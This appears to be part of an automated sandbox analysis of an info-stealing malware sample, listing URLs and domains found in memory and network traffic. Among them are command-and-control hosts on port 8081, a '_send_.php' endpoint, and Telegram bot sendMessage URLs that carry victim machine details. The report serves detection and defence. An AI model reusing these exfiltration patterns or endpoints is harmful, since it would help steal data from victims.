https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=enhF	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2008:15:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://status.thawte.com0:	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2007:07:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Virustotal		Browse
https://www.office.com/	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
http://smtp.zoho.eu	0%	Avira URL Cloud	safe
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Virustotal		Browse
https://www.office.com/x6	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Virustotal		Browse
http://smtp.zoho.eu	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smtp.zoho.eu	185.230.212.164	true	true	0%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.8.169	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2008:15:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2007:07:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enx6	AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/hF	AddInProcess32.exe, 00000011.00000002.2944387011.00000000030AD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	AddInProcess32.exe, 00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002898000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.office.com/lB	AddInProcess32.exe, 00000011.00000002.2944387011.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C77000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tiro.com	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	AddInProcess32.exe, 00000011.00000002.2957865272.0000000004084000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000040AB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000003EDC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000418D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004036000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D4C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enhF	AddInProcess32.exe, 00000011.00000002.2944387011.000000000307C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://status.thawte.com0:	AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	AddInProcess32.exe, 00000011.00000002.2957865272.0000000004168000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004012000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000403D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004269000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C46000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	AddInProcess32.exe, 00000011.00000002.2944387011.0000000003086000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	AddInProcess32.exe, 00000011.00000002.2957865272.0000000004084000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000040AB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000003EDC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000418D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004036000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D4C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://smtp.zoho.eu	AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/x6	AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F29000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.jiyu-kobo.co.jp/	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	AddInProcess32.exe, 00000011.00000002.2957865272.0000000004168000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004012000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000403D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004269000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C46000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

